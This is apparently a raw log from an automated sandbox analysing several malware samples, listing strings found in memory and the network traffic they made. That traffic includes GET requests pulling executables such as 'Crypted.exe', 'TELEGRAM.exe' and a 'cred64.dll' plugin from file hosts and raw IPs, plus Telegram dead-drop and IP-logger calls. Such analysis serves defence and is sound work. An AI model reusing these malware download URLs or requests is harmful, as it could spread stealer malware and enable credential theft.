Source: 816F.exe, 0000001A.00000003.481873237.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.482552811.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.483230683.00000000060F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/U
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 816F.exe, 0000001A.00000003.481873237.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.482552811.00000000060F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn3
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: argq.exe.33.dr, argq[1].exe.33.dr String found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: 816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/c
Source: 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/P
Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/c
Source: 816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/typo
Source: 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 816F.exe, 0000001A.00000003.483869752.00000000060F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cnU
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 453D.exe.1.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: 453D.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: 453D.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: 86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 41479232570897308364731578.45.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/L
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
Source: 86EE.exe, 0000002D.00000003.488301104.00000000275CA000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488058790.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome?p=update_error
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/chrome?p=update_errorFix
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://support.google.com/installer/?product=
Source: 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/deadftx
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/deadftxhttps://www.tiktok.com/
Source: 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
Source: 86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.489485701.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: 94088433411392910584223625.45.dr String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/
Source: unknown DNS traffic detected: queries for: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
Source: global traffic HTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic HTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
Source: global traffic HTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
Source: global traffic HTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
Source: global traffic HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:54 GMTServer: ApacheCache-Control: no-cache, privateUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:51 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 35 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 37Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e f8 91 ab fd b0 54 4a b3 dd 64 f8 f7 10 74 94 f2 83 Data Ascii: %S`Nh&WQY^TJdt
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e2 93 b4 fa b1 1d 4c ae 9e 28 fa f7 52 68 93 e3 84 e1 75 Data Ascii: %S`Nh&WQY^L(Rhu
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 86 bb fa a5 15 45 a9 c4 22 fa f4 53 33 85 a5 88 f1 36 f0 85 88 b9 Data Ascii: %S`Nh&WQY^E"S36
